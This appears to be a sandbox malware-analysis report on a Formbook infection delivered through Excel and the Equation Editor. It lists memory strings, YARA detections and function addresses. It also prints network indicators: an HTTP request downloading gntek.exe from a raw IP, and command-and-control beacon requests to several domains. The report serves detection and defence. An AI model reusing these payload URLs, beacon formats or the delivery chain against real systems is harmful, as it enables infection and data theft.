          Source: explorer.exe, 00000006.00000000.491342843.0000000003E50000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.489156075.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.485165517.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.487661348.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.478539396.00000000044E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.480526320.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.537917620.00000000044E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540680733.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540596693.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.538461267.000000000460B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.485165517.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.487661348.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.480526320.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540680733.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540596693.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.538461267.000000000460B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: msdt.exe, 00000007.00000002.669852411.0000000002C92000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mollyagee.remax.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE    File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83D9E331.emf
          Source: unknown    DNS traffic detected: queries for: www.927291.com
          Source: global traffic    HTTP traffic detected: GET /gntek.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.120Connection: Keep-Alive
          Source: global traffic    HTTP traffic detected: GET /b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.927291.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic    HTTP traffic detected: GET /b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.teentykarm.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic    HTTP traffic detected: GET /b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.zoharfine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic    HTTP traffic detected: GET /b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.mollyagee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Source: Yara match    File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match    File source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPE
          Source: Yara match    File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match    File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match    File source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match    File source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match    File source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Screenshot number: 8    Screenshot OCR: protected documents the yellow bar above 26 27 28 29 ~ 0 30 31 :j " I ": " : ::' # 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE    File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE    File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040604C
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404772
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00460A3A
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00401030
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C8C5
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B8F3
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C134
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041D2AE
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00408C8B
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00408C90
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041CF5F
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075905A
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00743040
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0076D005
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073E0C6
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E1238
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073E2E9
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0078A37B
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00747353
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00742305
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007663DB
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073F3CF
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E63BF
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0077D47D
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00775485
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00751489
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00786540
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0074351F
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075C5F0
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0078A634
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E2622
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0074E6C1
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00744680
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007757C3
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0074C7BC
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C579A
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0076286D
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0074C85C
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007DF8EE
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C5955
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026D1238
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0262E2E9
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0267A37B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02637353
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02632305
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0262F3CF
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026563DB
